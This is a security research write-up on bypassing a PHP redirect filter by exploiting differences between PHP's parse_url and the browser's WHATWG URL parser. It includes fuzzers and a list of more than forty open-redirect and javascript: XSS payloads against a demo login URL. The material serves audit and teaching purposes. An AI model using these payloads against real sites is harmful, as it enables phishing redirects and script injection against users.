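In August 2022, while hunting bugs for the Topsec (天融信) SRC, I found that one of Topsec's sites was running the redacted system, so I downloaded the redacted source code from GitHub and audited it.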
Source & Sink
The audit showed that the redacted system uses a goto parameter in many places to redirect pages, for example in the login feature:
http://demo.redacted.com/login?goto=/
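If an already logged-in user visits this URL, the back end reads the value of the goto parameter and writes it into the custom data-goto attribute of a div tag in the Twig template: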
{% block content %}
<div id="page-message-container" class="page-message-container" data-goto="{{ goto }}" data-duration={{ duration }}>
<div class="page-message-panel">
<div class="page-message-heading">
<h2 class="page-message-title">{{ title|trans }}</h2>
</div>
<div class="page-message-body">{{ message|default('')|trans|raw }}</div>
</div>
</div>
{% endblock %}
The front end then reads the value of the data-goto attribute with the following JS code and redirects the page via window.location.href:
function (e, t) {
var n = $("#page-message-container"),
r = n.data("goto"),
o = n.data("duration");
o > 0 && r && setTimeout((function () {
window.location.href = r
}), o)
}
Sanitizer/Filter
To prevent open redirects (OR) and XSS during page redirection, redacted implements a dedicated back-end filter that sanitizes the URL in the goto parameter:
/**
* Filter a URL.
*
* If the URL does not belong to this site's domain, return the site's homepage URL.
*
* @param $url string the URL to filter
*
* @return string
*/
public function filterRedirectUrl($url)
{
$host = $this->get('request_stack')->getCurrentRequest()->getHost();
$safeHosts = [$host];
$parsedUrl = parse_url($url);
$isUnsafeHost = isset($parsedUrl['host']) && !in_array($parsedUrl['host'], $safeHosts);
$isInvalidUrl = isset($parsedUrl['scheme']) && !in_array($parsedUrl['scheme'], ['http', 'https']);
if (empty($url) || $isUnsafeHost || $isInvalidUrl) {
$url = $this->generateUrl('homepage', [], UrlGeneratorInterface::ABSOLUTE_URL);
}
return strip_tags($url);
}
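The filter works roughly as follows:
1. Take the Host header of the current HTTP request and use it as the host allowlist.
2. Define the scheme allowlist: http, https.
3. Parse the supplied URL with PHP's URL parser (parse_url) to get its host and scheme components.
4. If a host or scheme component is present, check that the host is in the host allowlist and that the scheme is in the scheme allowlist.
5. Otherwise, treat the input as a relative URL and let it through.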
Bypassing the host check
How can the filter's host check be bypassed?
I remembered a payload I had previously used to bypass SSRF filters:
https://demo.redacted.com/login?goto=http://baidu.com\@demo.redacted.com/
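This payload works because the back-end and front-end URL parsers disagree:
- PHP's parse_url treats demo.redacted.com as the host of the URL, which matches the Host header of the HTTP request, so the check passes.
- The JS URL parser sees it differently: it normalizes \ to /, so after parsing the payload becomes:
http://baidu.com/@demo.redacted.com/
The front end therefore treats baidu.com as the host of the URL.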
> new URL('http://baidu.com\\@demo.redacted.com/')
URL {origin: 'http://baidu.com', protocol: 'http:', username: '', password: '', host: 'baidu.com', …}
hash: ""
host: "baidu.com"
hostname: "baidu.com"
href: "http://baidu.com/@demo.redacted.com/"
origin: "http://baidu.com"
password: ""
pathname: "/@demo.redacted.com/"
port: ""
protocol: "http:"
search: ""
searchParams: URLSearchParams {}
username: ""
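The disagreement can be reproduced outside the browser. The sketch below is an illustration only: `rfcHost` is a hypothetical helper built on the generic regular expression from RFC 3986 Appendix B and serves as a stand-in for an RFC-style parser; it is not PHP's actual parse_url implementation. It is compared with the WHATWG parser exposed as `new URL`.

```javascript
// Hypothetical RFC-style host extraction, based on the regex in RFC 3986 Appendix B.
// This is a stand-in for "an RFC-style parser", not PHP's real parse_url.
const RFC3986 = /^(([^:\/?#]+):)?(\/\/([^\/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?/;

function rfcHost(input) {
  const authority = input.match(RFC3986)[4];   // text between "//" and the next "/", "?" or "#"
  if (authority === undefined) return null;    // no authority component at all
  const hostPort = authority.slice(authority.lastIndexOf('@') + 1); // drop userinfo
  return hostPort.replace(/:\d*$/, '');        // drop an optional port
}

const payload = 'http://baidu.com\\@demo.redacted.com/';

console.log(rfcHost(payload));            // demo.redacted.com
console.log(new URL(payload).hostname);   // baidu.com
```

The RFC-style view treats everything before the @ as userinfo, while the WHATWG parser has already ended the authority at the backslash.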
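Bypassing the scheme check
Bypassing the host check alone only yields an open redirect. To get XSS, the back-end scheme check has to be bypassed as well. How?
One way in: vulnerabilities usually stem from wrong assumptions made by a program, so we can look for the wrong assumptions the filter makes and then try to break them.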
$parsedUrl = parse_url($url);
$isUnsafeHost = isset($parsedUrl['host']) && ! in_array($parsedUrl['host'], $safeHosts);
$isInvalidUrl = isset($parsedUrl['scheme']) && ! in_array($parsedUrl['scheme'], ['http', 'https']);
if (empty($url) || $isUnsafeHost || $isInvalidUrl) {
$url = $this->generateUrl('homepage', [], UrlGeneratorInterface::ABSOLUTE_URL);
}
return strip_tags($url);
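Looking at the filter code again, the filter assumes that:
1. If no host and no scheme can be parsed from the URL, the URL must be relative.
2. A "relative URL" is always safe.
So what happens if we make parse_url return false?
false['host'] === NULL
false['scheme'] === NULL
Both isset() checks then evaluate to false, so the filter concludes that the URL has neither a host nor a scheme and must be a relative URL. Since relative URLs are assumed to be safe, the input is returned to the front end unchanged.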
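The effect of a failed parse can be modeled in a few lines. The following is a JavaScript sketch of the filter's decision logic, not the original PHP: `filterRedirectUrl`, `HOMEPAGE`, `SAFE_HOSTS` and the `parsed` argument (standing in for the return value of parse_url) are names assumed for illustration, and the final strip_tags call is left out.

```javascript
// Hypothetical JS model of the filter's decision logic (the real filter is PHP).
const HOMEPAGE = 'https://demo.redacted.com/';   // assumed homepage URL
const SAFE_HOSTS = ['demo.redacted.com'];
const SAFE_SCHEMES = ['http', 'https'];

// `parsed` stands in for PHP's parse_url() result: an object, or false on failure.
function filterRedirectUrl(url, parsed) {
  // Mirrors isset($parsedUrl['host']): false when the key is missing or parsed is false.
  const hasHost = Boolean(parsed) && parsed.host !== undefined;
  const hasScheme = Boolean(parsed) && parsed.scheme !== undefined;
  const isUnsafeHost = hasHost && !SAFE_HOSTS.includes(parsed.host);
  const isInvalidUrl = hasScheme && !SAFE_SCHEMES.includes(parsed.scheme);
  return (!url || isUnsafeHost || isInvalidUrl) ? HOMEPAGE : url;
}

// A normally parsed external URL is rejected and replaced by the homepage...
console.log(filterRedirectUrl('http://evil.example/', { scheme: 'http', host: 'evil.example' }));
// ...but a parse failure (false) passes both checks and the input comes back unchanged.
console.log(filterRedirectUrl('javascript:///%0dalert(1)', false));
```

In this model a parse failure is indistinguishable from a harmless relative path, which is exactly the assumption the payloads below exploit.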
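How can we make parse_url return false?
PHP's URL parser is modeled on the RFCs, so when the input deviates far enough from the RFC syntax, parse_url returns false.
A classic payload of this kind gives an even simpler open redirect: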
https://demo.redacted.com/login?goto=http:///baidu.com
RFC 1738 specifies that in a hierarchical absolute URL, the part after the scheme must start with //:
The scheme specific data start with a double slash "//" to indicate that it complies with the common Internet scheme syntax.
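In http:///baidu.com the host that should follow the // is empty, so PHP's URL parser treats the URL as invalid and returns false. The filter therefore skips all further checks and hands the URL to the front end.
The front-end URL parser disagrees and normalizes http:///baidu.com to http://baidu.com/: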
> new URL('http:///baidu.com')
URL {origin: 'http://baidu.com', protocol: 'http:', username: '', password: '', host: 'baidu.com', …}
hash: ""
host: "baidu.com"
hostname: "baidu.com"
href: "http://baidu.com/"
origin: "http://baidu.com"
password: ""
pathname: "/"
port: ""
protocol: "http:"
search: ""
searchParams: URLSearchParams {}
username: ""
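This results in an open redirect.
What if we swap the http scheme for javascript? The RFC only says that hierarchical URLs must contain the // prefix; it does not clearly say how a URL parser should handle a non-hierarchical URL that contains the // prefix: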
javascript:alert(1)
javascript://alert(1)
mailto:happyhacking@qq.com
mailto://happyhacking@qq.com
That led me to the following payload:
https://demo.redacted.com/login?goto=javascript:///%250dalert(1)
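After the server URL-decodes the query string once, the filter receives javascript:///%0dalert(1). PHP's URL parser considers it invalid and returns false, so the filter skips the scheme check and treats the value as a safe "relative URL". The double encoding (%250d) is needed because a raw carriage return would be removed by the front-end URL parser, as the WHATWG rules quoted later in this article show.
The front-end URL parser has its own ideas. Reflected into the front end, the payload becomes:
window.location.href = 'javascript:///%0dalert(1)'
The browser parses the scheme as javascript, percent-decodes the rest (turning %0d into a carriage return, \r) and hands it to the JS engine. The JS engine treats // as the start of a single-line comment, and because \r is a line terminator, alert(1) becomes the next line of code.
The result is XSS.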
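The comment-and-newline trick can be checked without a browser. The sketch below assumes, as described above, that the body of a javascript: URL is percent-decoded before it is evaluated; `hit` is a hypothetical stand-in for alert so that the snippet also runs under Node.js.

```javascript
// The part of the payload after "javascript:", as it reaches the browser.
const body = '///%0dhit()';

// Percent-decoding turns %0d into a carriage return, which is a JS line terminator.
const source = decodeURIComponent(body);

let called = false;
// Evaluate the decoded source with `hit` bound to a harmless function (stand-in for alert).
new Function('hit', source)(() => { called = true; });

console.log(JSON.stringify(source)); // "///\rhit()"
console.log(called);                 // true: the comment only covers the first line
```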
Further research
Can a fuzzer uncover more inconsistencies between the JS URL parser and the PHP URL parser?
http:{char}//localhost:80/xxxx
Is there a character that can be placed between http: and //, at the {char} position, such that the front-end URL parser still sees localhost as the host of the URL?
The fuzzer:
log=[];
for(let i=0;i<=0x10ffff;i++){
try{
let url = new URL('http:'+String.fromCodePoint(i)+'//localhost:80/xxxx')
if(url['host'] == 'localhost' ){
console.log(i+':URL encoded i : '+encodeURI(String.fromCodePoint(i)))
log.push(i);
}
}catch(e){}
}
log
Results from the front-end URL parser:
9: URL encoded i : %09 -> http:%09//localhost
10: URL encoded i : %0A -> http:%0a//localhost
13: URL encoded i : %0D -> http:%0d//localhost
47: URL encoded i : / -> http:///localhost
92: URL encoded i : %5C -> http:\//localhost
How does PHP's URL parser handle them?
["http:%09//localhost"]=>
array(2) {
["scheme"]=>
string(4) "http"
["path"]=>
string(14) "%09//localhost"
}
["http:%0d//localhost"]=>
array(2) {
["scheme"]=>
string(4) "http"
["path"]=>
string(14) "%0d//localhost"
}
["http:%0a//localhost"]=>
array(2) {
["scheme"]=>
string(4) "http"
["path"]=>
string(14) "%0a//localhost"
}
["http:\//localhost"]=>
array(2) {
["scheme"]=>
string(4) "http"
["path"]=>
string(12) "\//localhost"
}
["http:///localhost"]=>
bool(false)
As shown, PHP's URL parser either treats everything after http: as the path, or rejects the URL as invalid and returns false.
In other words, the following payloads also bypass the redacted filter and lead to an open redirect:
https://demo.redacted.com/login?goto=http:\//www.baidu.com
https://demo.redacted.com/login?goto=http:%0d\\www.baidu.com
https://demo.redacted.com/login?goto=http:%0a\\www.baidu.com
https://demo.redacted.com/login?goto=http:%09\\www.baidu.com
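These payloads can be checked against the WHATWG parser directly. The sketch below assumes the server has already URL-decoded the goto value once (done here with decodeURIComponent) and uses the global URL class of Node.js as a stand-in for the browser's parser.

```javascript
// goto values as they appear in the query string (backslashes escaped for JS).
const gotoValues = [
  'http:\\//www.baidu.com',      // http:\//www.baidu.com
  'http:%0d\\\\www.baidu.com',   // http:%0d\\www.baidu.com
  'http:%0a\\\\www.baidu.com',   // http:%0a\\www.baidu.com
  'http:%09\\\\www.baidu.com',   // http:%09\\www.baidu.com
];

const hosts = gotoValues.map((value) => {
  const decoded = decodeURIComponent(value); // what the back end writes into data-goto
  return new URL(decoded).hostname;          // what the front-end parser sees
});

console.log(hosts); // every entry is "www.baidu.com"
```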
http{char}://localhost:80/xxxx
Is there a character that can be placed between http and :// such that the front-end URL parser still sees localhost as the host and http as the scheme?
The fuzzer:
log=[];
for(let i=0;i<=0x10ffff;i++){
try{
let url = new URL('http'+String.fromCodePoint(i)+'://localhost:80/xxxx')
if(url['host'] == 'localhost' && url['protocol'] == 'http:'){
console.log('i: '+i+' URL encoded i : '+encodeURI(String.fromCodePoint(i)));
console.log(url);
log.push(i);
}
}catch(e){}
}
log
Results from the front-end URL parser:
9: URL encoded i : %09
10: URL encoded i : %0A
13: URL encoded i : %0D
This time only three characters survive; / and \ are gone. That gives the following three payloads:
http%09://baidu.com
http%0a://baidu.com
http%0d://baidu.com
How does PHP's URL parser handle them?
["http%09://localhost:80/xxx"]=>
array(1) {
["path"]=>
string(26) "http%09://localhost:80/xxx"
}
["http%0a://localhost:80/xxx"]=>
array(1) {
["path"]=>
string(26) "http%0a://localhost:80/xxx"
}
["http%0d://localhost:80/xxx"]=>
array(1) {
["path"]=>
string(26) "http%0d://localhost:80/xxx"
}
PHP treats the entire URL as the path, that is, as a relative URL.
This bypasses both the scheme check and the host check of the filter:
window.location.href='http\n://localhost:80/xxx' // works!
window.location.href='javascript\n:alert(1)' // works!
window.location.href='javascript\r:alert(1)' // works!
window.location.href='javascript\t:alert(1)' // works!
Payloads:
https://demo.redacted.com/login?goto=javascript%0d:alert(1) // works!
https://demo.redacted.com/login?goto=javascript%0a:alert(1) // works!
https://demo.redacted.com/login?goto=javascript%09:alert(1) // works!
https://demo.redacted.com/login?goto=http%09://baidu.com // works!
{char}http://localhost:80/xxxx
Is there a character that can be placed in front of the http scheme such that the front-end URL parser still sees localhost as the host and http as the scheme?
log=[];
for(let i=0;i<=0x10ffff;i++){
try{
let url = new URL(String.fromCodePoint(i)+'http://localhost:80/xxxx')
if(url['host'] == 'localhost' && url['protocol'] == 'http:'){
console.log(`i: ${i} ,URL encoded i : `+encodeURI(String.fromCodePoint(i))+' string begin:'+String.fromCodePoint(i)+'string end')
log.push(i);
}
}catch(e){}
}
log
log.forEach(i=>{
//console.log(encodeURI(String.fromCodePoint(i))+'http://localhost:80/xxxx')
console.log(encodeURI(String.fromCodePoint(i))+'javascript:alert(1)')
})
This produced the following payloads:
%00http://localhost:80/xxxx
%01http://localhost:80/xxxx
%02http://localhost:80/xxxx
%03http://localhost:80/xxxx
%04http://localhost:80/xxxx
%05http://localhost:80/xxxx
%06http://localhost:80/xxxx
%07http://localhost:80/xxxx
%08http://localhost:80/xxxx
%09http://localhost:80/xxxx
%0Ahttp://localhost:80/xxxx
%0Bhttp://localhost:80/xxxx
%0Chttp://localhost:80/xxxx
%0Dhttp://localhost:80/xxxx
%0Ehttp://localhost:80/xxxx
%0Fhttp://localhost:80/xxxx
%10http://localhost:80/xxxx
%11http://localhost:80/xxxx
%12http://localhost:80/xxxx
%13http://localhost:80/xxxx
%14http://localhost:80/xxxx
%15http://localhost:80/xxxx
%16http://localhost:80/xxxx
%17http://localhost:80/xxxx
%18http://localhost:80/xxxx
%19http://localhost:80/xxxx
%1Ahttp://localhost:80/xxxx
%1Bhttp://localhost:80/xxxx
%1Chttp://localhost:80/xxxx
%1Dhttp://localhost:80/xxxx
%1Ehttp://localhost:80/xxxx
%1Fhttp://localhost:80/xxxx
%20http://localhost:80/xxxx
Replacing the http scheme with javascript:
%00javascript:alert(1)
%01javascript:alert(1)
%02javascript:alert(1)
%03javascript:alert(1)
%04javascript:alert(1)
%05javascript:alert(1)
%06javascript:alert(1)
%07javascript:alert(1)
%08javascript:alert(1)
%09javascript:alert(1)
%0Ajavascript:alert(1)
%0Bjavascript:alert(1)
%0Cjavascript:alert(1)
%0Djavascript:alert(1)
%0Ejavascript:alert(1)
%0Fjavascript:alert(1)
%10javascript:alert(1)
%11javascript:alert(1)
%12javascript:alert(1)
%13javascript:alert(1)
%14javascript:alert(1)
%15javascript:alert(1)
%16javascript:alert(1)
%17javascript:alert(1)
%18javascript:alert(1)
%19javascript:alert(1)
%1Ajavascript:alert(1)
%1Bjavascript:alert(1)
%1Cjavascript:alert(1)
%1Djavascript:alert(1)
%1Ejavascript:alert(1)
%1Fjavascript:alert(1)
%20javascript:alert(1)
How does PHP's URL parser handle them?
["%00http://localhost:80/xxxx"]=>
array(1) {
["path"]=>
string(27) "%00http://localhost:80/xxxx"
}
["%01http://localhost:80/xxxx"]=>
array(1) {
["path"]=>
string(27) "%01http://localhost:80/xxxx"
}
["%1Djavascript:alert(1)"]=>
array(1) {
["path"]=>
string(22) "%1Djavascript:alert(1)"
}
["%1Ejavascript:alert(1)"]=>
array(1) {
["path"]=>
string(22) "%1Ejavascript:alert(1)"
}
PHP's URL parser treats the whole URL as a relative URL.
So all of the following payloads bypass both the scheme check and the host check of the redacted filter:
https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
https://demo.redacted.com/login?goto=%03javascript:alert(1)
https://demo.redacted.com/login?goto=%04javascript:alert(1)
https://demo.redacted.com/login?goto=%05javascript:alert(1)
https://demo.redacted.com/login?goto=%06javascript:alert(1)
https://demo.redacted.com/login?goto=%07javascript:alert(1)
https://demo.redacted.com/login?goto=%08javascript:alert(1)
https://demo.redacted.com/login?goto=%09javascript:alert(1)
https://demo.redacted.com/login?goto=%0Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%0Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Djavascript:alert(1)
https://demo.redacted.com/login?goto=%0Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%0Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%10javascript:alert(1)
https://demo.redacted.com/login?goto=%11javascript:alert(1)
https://demo.redacted.com/login?goto=%12javascript:alert(1)
https://demo.redacted.com/login?goto=%13javascript:alert(1)
https://demo.redacted.com/login?goto=%14javascript:alert(1)
https://demo.redacted.com/login?goto=%15javascript:alert(1)
https://demo.redacted.com/login?goto=%16javascript:alert(1)
https://demo.redacted.com/login?goto=%17javascript:alert(1)
https://demo.redacted.com/login?goto=%18javascript:alert(1)
https://demo.redacted.com/login?goto=%19javascript:alert(1)
https://demo.redacted.com/login?goto=%1Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%1Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Djavascript:alert(1)
https://demo.redacted.com/login?goto=%1Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%1Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%20javascript:alert(1)
ht{char}tp://localhost:80/xxxx
Let's be a bit bolder: is there a character that can be placed between ht and tp such that the front-end URL parser still sees http as the scheme and localhost as the host?
The fuzzer:
log=[];
for(let i=0;i<=0x10ffff;i++){
try{
let url = new URL('ht'+String.fromCodePoint(i)+'tp://localhost:80/xxxx')
if(url['host'] == 'localhost' && url['protocol'] == 'http:'){
console.log('i: '+i+' URL encoded i : '+encodeURI(String.fromCodePoint(i)));
console.log(url);
log.push(i);
}
}catch(e){}
}
log
Results:
i: 9 URL encoded i : %09
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
i: 10 URL encoded i : %0A
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
i: 13 URL encoded i : %0D
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
Array(3) [ 9, 10, 13 ]
This gives the following payloads:
ht%0dtp://localhost
ht%0atp://localhost
ht%09tp://localhost
java%09script:alert(1)
java%0dscript:alert(1)
java%0ascript:alert(1)
How does PHP's URL parser handle these malformed URLs?
["ht%0dtp://localhost"]=>
array(1) {
["path"]=>
string(19) "ht%0dtp://localhost"
}
["ht%0atp://localhost"]=>
array(1) {
["path"]=>
string(19) "ht%0atp://localhost"
}
["ht%09tp://localhost"]=>
array(1) {
["path"]=>
string(19) "ht%09tp://localhost"
}
["java%09script:alert(1)"]=>
array(1) {
["path"]=>
string(22) "java%09script:alert(1)"
}
["java%0dscript:alert(1)"]=>
array(1) {
["path"]=>
string(22) "java%0dscript:alert(1)"
}
["java%0ascript:alert(1)"]=>
array(1) {
["path"]=>
string(22) "java%0ascript:alert(1)"
}
Once again PHP's URL parser treats all of these as 'well-formed' relative URLs, so every one of them passes the redacted filter:
https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)
In fact, these three characters can be placed anywhere in the scheme:
https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)
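The four fuzzers above differ only in where the extra character is inserted, so they can be folded into one helper. This is a sketch rather than the code used to produce the results above: `fuzzInsert` and its parameters are names introduced here, and the usage example scans ASCII only to keep it fast.

```javascript
// Hypothetical helper: insert every code point in [from, to] between `prefix` and
// `suffix`, and keep those for which the WHATWG parser still reports the expected
// scheme and host.
function fuzzInsert(prefix, suffix, { protocol = 'http:', host = 'localhost', from = 0, to = 0x10ffff } = {}) {
  const hits = [];
  for (let cp = from; cp <= to; cp++) {
    try {
      const url = new URL(prefix + String.fromCodePoint(cp) + suffix);
      if (url.protocol === protocol && url.host === host) hits.push(cp);
    } catch (e) {
      // new URL throws on input it cannot parse; such code points are skipped
    }
  }
  return hits;
}

const ascii = { to: 0x7f };
console.log(fuzzInsert('http:', '//localhost:80/xxxx', ascii)); // [ 9, 10, 13, 47, 92 ]
console.log(fuzzInsert('http', '://localhost:80/xxxx', ascii)); // [ 9, 10, 13 ]
console.log(fuzzInsert('ht', 'tp://localhost:80/xxxx', ascii)); // [ 9, 10, 13 ]
console.log(fuzzInsert('', 'http://localhost:80/xxxx', ascii).length); // 33 (0x00-0x20)
```

Passing a different `protocol` and `host` lets the same loop probe other schemes; dropping the `to` option restores the full Unicode scan.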
Payload summary
By digging further into the inconsistencies between the JavaScript URL parser and the PHP URL parser, I found more than forty ways to bypass the redacted filter:
https://demo.redacted.com/login?goto=http://baidu.com\@demo.redacted.com/
https://demo.redacted.com/login?goto=javascript:///%250dalert(1)
https://demo.redacted.com/login?goto=http:///www.baidu.com
https://demo.redacted.com/login?goto=http:\//www.baidu.com
https://demo.redacted.com/login?goto=http:%0d\\www.baidu.com
https://demo.redacted.com/login?goto=http:%0a\\www.baidu.com
https://demo.redacted.com/login?goto=http:%09\\www.baidu.com
https://demo.redacted.com/login?goto=javascript%0d:alert(1)
https://demo.redacted.com/login?goto=javascript%0a:alert(1)
https://demo.redacted.com/login?goto=javascript%09:alert(1)
https://demo.redacted.com/login?goto=http%09://baidu.com
https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
https://demo.redacted.com/login?goto=%03javascript:alert(1)
https://demo.redacted.com/login?goto=%04javascript:alert(1)
https://demo.redacted.com/login?goto=%05javascript:alert(1)
https://demo.redacted.com/login?goto=%06javascript:alert(1)
https://demo.redacted.com/login?goto=%07javascript:alert(1)
https://demo.redacted.com/login?goto=%08javascript:alert(1)
https://demo.redacted.com/login?goto=%09javascript:alert(1)
https://demo.redacted.com/login?goto=%0Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%0Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Djavascript:alert(1)
https://demo.redacted.com/login?goto=%0Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%0Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%10javascript:alert(1)
https://demo.redacted.com/login?goto=%11javascript:alert(1)
https://demo.redacted.com/login?goto=%12javascript:alert(1)
https://demo.redacted.com/login?goto=%13javascript:alert(1)
https://demo.redacted.com/login?goto=%14javascript:alert(1)
https://demo.redacted.com/login?goto=%15javascript:alert(1)
https://demo.redacted.com/login?goto=%16javascript:alert(1)
https://demo.redacted.com/login?goto=%17javascript:alert(1)
https://demo.redacted.com/login?goto=%18javascript:alert(1)
https://demo.redacted.com/login?goto=%19javascript:alert(1)
https://demo.redacted.com/login?goto=%1Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%1Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Djavascript:alert(1)
https://demo.redacted.com/login?goto=%1Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%1Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%20javascript:alert(1)
https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)
https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)
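Root cause
Why are the JavaScript URL parser and the PHP URL parser so inconsistent with each other?
Because there are two URL parsing standards in the world: the RFCs and the WHATWG standard. Building on the RFCs, the WHATWG wrote its own standard: URL parsing.
The JavaScript URL parser in browsers follows the WHATWG standard, while PHP's URL parser is loosely based on the RFCs. Node.js ships both kinds of parser, url.parse and new URL: the legacy url.parse is closer to the RFC model, and new URL follows the WHATWG standard.
The WHATWG URL parsing standard states: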
- If input contains any leading or trailing C0 control or space, validation error.
- Remove any leading and trailing C0 control or space from input.
If the input has C0 control characters or spaces at its start or end, the parser reports a validation error and then removes all leading and trailing C0 controls and spaces. C0 controls cover 0x00-0x1F and space is 0x20, so together they cover 0x00-0x20.
What is a validation error?
A validation error indicates a mismatch between input and valid input. User agents, especially conformance checkers, are encouraged to report them somewhere. A validation error does not mean that the parser terminates. Termination of a parser is always stated explicitly, e.g., through a return statement.
A validation error only signals a mismatch between the input and valid input; it does not terminate parsing. The standard merely encourages implementations to report it somewhere.
That is why the following payloads work:
https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
...
https://demo.redacted.com/login?goto=%20javascript:alert(1)
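The first rule is easy to mirror. In the sketch below, `stripC0AndSpace` is a hypothetical helper that applies only this one preprocessing step; the loop then checks that new URL reaches the javascript scheme for every leading character from 0x00 to 0x20.

```javascript
// Hypothetical helper mirroring one step of the standard:
// "Remove any leading and trailing C0 control or space from input."
function stripC0AndSpace(input) {
  return input.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
}

const protocols = new Set();
for (let cp = 0x00; cp <= 0x20; cp++) {
  const input = String.fromCodePoint(cp) + 'javascript:alert(1)';
  // The helper should leave exactly the bare javascript: URL.
  if (stripC0AndSpace(input) !== 'javascript:alert(1)') throw new Error('helper mismatch at ' + cp);
  // Record which scheme the real parser sees for this input.
  protocols.add(new URL(input).protocol);
}

console.log([...protocols]); // [ 'javascript:' ]
```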
The standard also states:
- If input contains any ASCII tab or newline, validation error.
- Remove all ASCII tab or newline from input.
Which characters count as ASCII tab or newline?
An ASCII tab or newline is U+0009 TAB, U+000A LF, or U+000D CR.
So in the payloads below, the characters encoded as %0d, %0a and %09 are all removed by the JavaScript URL parser:
https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)
https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)
In other words, the three characters %0d, %0a and %09 can be placed anywhere in the URL to obfuscate it, because the JavaScript URL parser removes them anyway. For example:
new URL('http:/\x09/baidu.com')
URL {
origin: 'http://baidu.com',
protocol: 'http:',
username: '',
password: '',
host: 'baidu.com'
}
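The second rule can be mirrored the same way. `stripTabAndNewline` below is a hypothetical helper for just this step, and the samples are the decoded forms of payloads from this article.

```javascript
// Hypothetical helper mirroring one step of the standard:
// "Remove all ASCII tab or newline from input."
function stripTabAndNewline(input) {
  return input.replace(/[\t\n\r]/g, '');
}

const samples = [
  'ht\rtp://baidu.com',
  'java\tscript:alert(1)',
  'java\nsc\nript:alert(1)',
  'http:/\t/baidu.com',
];

for (const sample of samples) {
  const cleaned = stripTabAndNewline(sample);
  // Print the raw input, the cleaned string, and the scheme the real parser reports.
  console.log(JSON.stringify(sample), '->', cleaned, new URL(sample).protocol);
}
```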
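Conclusion
Few things are worse than having two standards for the same thing: if the standards are inconsistent, the implementations will inevitably be inconsistent too. Security problems caused by such inconsistencies are hard to spot, because each system looks fine when audited on its own, and the problem only appears once several systems are connected and work together. This also shows that a security audit has to consider the whole picture rather than a single system in isolation.
It is also worth noting that wherever a standard or specification is silent or ambiguous, the developers implementing it will interpret it differently, which leads to inconsistencies between the languages, libraries, frameworks and software that implement it. These inconsistencies are fertile ground for new attack techniques.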
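+-------------------------------------------------------------------------------+
| Two standards / ambiguous wording / unspecified behavior / differing versions |
+-------------------------------------------------------------------------------+
                                        |
                                        v
                        +------------------------------+
                        | Inconsistent implementations |
                        +------------------------------+
                                        |
                                        v
                    +---------------------------------------+
                    | Bypass tricks / new attack techniques |
                    +---------------------------------------+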
References
- WHATWG - C0 control definition
- WHATWG - URL parsing standard
- WHATWG - validation error
- A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!
- EXPLOITING URL PARSERS: THE GOOD, BAD, AND INCONSISTENT
- HOW FRCKN' HARD IS IT TO UNDERSTAND A URL?! - uXSS CVE-2018-6128
- How did Masato find the Google Search XSS?
- Fuzzing Browsers for weird XSS Vectors
- Daniel Stenberg - ONE URL STANDARD PLEASE (2017)
- Daniel Stenberg - DON’T MIX URL PARSERS (2022)